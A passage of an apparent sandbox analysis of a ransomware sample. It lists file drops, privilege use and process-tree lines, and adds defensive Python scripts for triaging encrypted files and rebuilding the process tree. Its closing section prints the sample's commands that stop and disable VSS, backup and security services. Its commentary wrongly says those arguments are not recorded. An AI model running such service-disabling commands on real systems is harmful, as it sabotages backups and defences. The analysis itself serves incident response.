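of paths copied from the report's table; the '.7j45q' suffix and the
'_HOW_TO_DECRYPT.txt' note name come from the report, while the regex, the
function names and the 32-character minimum blob length are assumptions.
"""
import re
from collections import Counter

NOTE_SUFFIX = "_HOW_TO_DECRYPT.txt"


def encrypted_name_re(ext):
    # <original name>.<blob of base64url-style characters>.<ext>
    # The original name is matched lazily so the blob is the last dotted
    # component before the extension, whatever dots the original had.
    return re.compile(r"^(?P<orig>.+?)\.(?P<blob>[A-Za-z0-9_-]{32,})\." + re.escape(ext) + r"$")


def split_path(path):
    """(directory, file name) for a Windows path."""
    head, _, tail = path.replace("/", "\\").rpartition("\\")
    return head, tail


def classify(path, ext):
    """Return (kind, details); kind is 'ransom_note', 'encrypted' or 'touched'."""
    d, name = split_path(path)
    if name.endswith(NOTE_SUFFIX):
        return "ransom_note", {"dir": d, "note": name}
    m = encrypted_name_re(ext).match(name)
    if m:
        return "encrypted", {"orig": m.group("orig"), "blob": m.group("blob")}
    return "touched", {"name": name}


def common_prefix(a, b):
    n = 0
    while n < min(len(a), len(b)) and a[n] == b[n]:
        n += 1
    return a[:n]


def triage(paths, ext):
    """Summarise a listing: counts per kind, ransom-note directories, the
    constant part of the appended blob, the variable tails, and the
    original extensions that were encrypted."""
    kinds = Counter()
    note_dirs = set()
    blobs = []
    orig_exts = Counter()
    touched = []
    for p in paths:
        kind, det = classify(p, ext)
        kinds[kind] += 1
        if kind == "ransom_note":
            note_dirs.add(det["dir"])
        elif kind == "encrypted":
            blobs.append(det["blob"])
            orig = det["orig"]
            orig_exts[orig.rsplit(".", 1)[1].lower() if "." in orig else ""] += 1
        else:
            touched.append(det["name"])
    prefix = ""
    if blobs:
        prefix = blobs[0]
        for b in blobs[1:]:
            prefix = common_prefix(prefix, b)
    tails = Counter(b[len(prefix):] for b in blobs)
    return {
        "counts": dict(kinds),
        "note_dirs": sorted(note_dirs),
        "blob_prefix": prefix,
        "blob_tails": dict(tails),
        "original_extensions": dict(orig_exts),
        "touched_not_renamed": touched,
    }


EXT = "7j45q"
LISTING = [  # copied from the report's 'Drops file in Program Files directory' table
    r"C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0158071.WMF.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q",
    r"C:\Program Files (x86)\Microsoft Office\Office14\1033\GRINTL32.DLL.IDX_DLL.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q",
    r"C:\Program Files\Java\jre7\lib\zi\America\Tijuana.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q",
    r"C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\css\cpu.css",
    r"C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipBand.dll.mui",
    r"C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SUMIPNTG\Bdfn_HOW_TO_DECRYPT.txt",
    r"C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\Bdfn_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_AAAAAAAAAAA0.7j45q",
    r"C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml.K1pPL30t_SAbx_ObxyR4PdMjiU0-rl_EBPNO87mL6Yz_IAAAACAAAAA0.7j45q",
]

if __name__ == "__main__":
    for k, v in triage(LISTING, EXT).items():
        print(f"{k}: {v}")
```

Run against a full listing of an affected volume (for example the output of a recursive directory walk), the "touched_not_renamed" group is the one to hand-check: it contains files the process opened for writing that do not carry the extension, so their state cannot be inferred from the name alone.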

Launches sc.exe

No indicator table is given for this signature; the sc.exe children of the sample (PIDs 1288, 1756, 1948, 1244 and 1008 in the WriteProcessMemory table below, at least five runs) are the evidence, and their arguments are not recorded.

Interacts with shadow copies

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\notepad.exe | N/A

Runs net.exe

No indicator table is given for this signature; the sample spawns net.exe eight times (PIDs 468, 564, 1860, 624, 1168, 1640, 1460 and 1896 in the WriteProcessMemory table below), and each net.exe in turn spawns net1.exe, which is how net.exe always executes its subcommands. The arguments are not recorded.

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Tokens 33, 34 and 35 are privilege LUIDs the sandbox did not resolve to names; in winnt.h they are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. The wmic.exe list, repeated for three separate wmic.exe runs (the third cut off in this report), is every privilege in an elevated token being enabled at once, which is wmic.exe's normal start-up behaviour; it is of interest only because the report does not record wmic's arguments. The wevtutil.exe rows are the meaningful ones: SeSecurityPrivilege and SeBackupPrivilege, the rights needed to clear or export the Security event log, are enabled three times, i.e. three wevtutil.exe runs, matching "Clears Windows event logs" above.

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 944 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 468 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 468 wrote to memory of 1036 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 468 wrote to memory of 1036 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 468 wrote to memory of 1036 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 564 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 564 wrote to memory of 1616 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 564 wrote to memory of 1616 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 564 wrote to memory of 1616 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1860 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1860 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1860 wrote to memory of 812 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 624 wrote to memory of 1004 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 624 wrote to memory of 1004 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 624 wrote to memory of 1004 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1168 wrote to memory of 1320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1168 wrote to memory of 1320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1168 wrote to memory of 1320 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1640 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1640 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1640 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1640 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\net.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe C:\Windows\system32\sc.exe
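The "wrote to memory of" entries above are one line per WriteProcessMemory call, not one line per process, which is why most children appear three times; the tree has to be deduplicated before the fan-out from PID 944 is counted. The block below is an added example written for this page, not output of the sandbox. It embeds the 29 signature lines above as a constructed sample (the sample's long file name abbreviated to sample.exe) and reconstructs the parent/child relationships, including the net.exe to net1.exe hop:

```python
"""Process-tree reconstruction from sandbox "wrote to memory of" lines.
Constructed sample: the signature lines from this report, with the sample's
file name abbreviated to sample.exe (an editor's abbreviation)."""
import re
import ntpath  # Windows-path basename even when run on a non-Windows host
from collections import Counter, defaultdict

LINE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

SAMPLE = r"""
PID 1640 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\net.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1460 wrote to memory of 1392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\net.exe
PID 944 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\net.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1896 wrote to memory of 1284 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1756 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
PID 944 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\sample.exe C:\Windows\system32\sc.exe
"""


def parse_events(text):
    """Parse lines into (parent_pid, child_pid, parent_image, child_image),
    dropping the repeated entries the sandbox emits for a single child."""
    events, seen = [], set()
    for line in text.strip().splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # not a write event; ignore
        ev = (int(m.group(1)), int(m.group(2)), m.group(3), m.group(4))
        if ev not in seen:
            seen.add(ev)
            events.append(ev)
    return events


def build_tree(events):
    """parent pid -> list of (child pid, child image basename), in report order."""
    tree = defaultdict(list)
    for ppid, cpid, _pimg, cimg in events:
        tree[ppid].append((cpid, ntpath.basename(cimg)))
    return dict(tree)


def spawn_summary(tree, pid):
    """Count of each child binary one process wrote into (its direct children)."""
    return Counter(img for _, img in tree.get(pid, []))


def descendants(tree, pid):
    """All pids reachable below pid, so net1.exe is attributed to the sample too."""
    out, stack = [], [pid]
    while stack:
        for child, _ in tree.get(stack.pop(), []):
            out.append(child)
            stack.append(child)
    return out


def roots(events):
    """Pids that write to others but are never written to within this excerpt."""
    parents = {e[0] for e in events}
    children = {e[1] for e in events}
    return sorted(parents - children)


if __name__ == "__main__":
    ev = parse_events(SAMPLE)
    tree = build_tree(ev)
    for root in roots(ev):
        print(root, "spawned", dict(spawn_summary(tree, root)),
              "descendants", descendants(tree, root))
```

PID 1640 shows up as a second root only because its own parent write falls outside the excerpt; on the full signature list it collapses into the tree under 944, and the six sc.exe and two net.exe children from one parent are the fan-out a detection would key on.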

Processes

C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

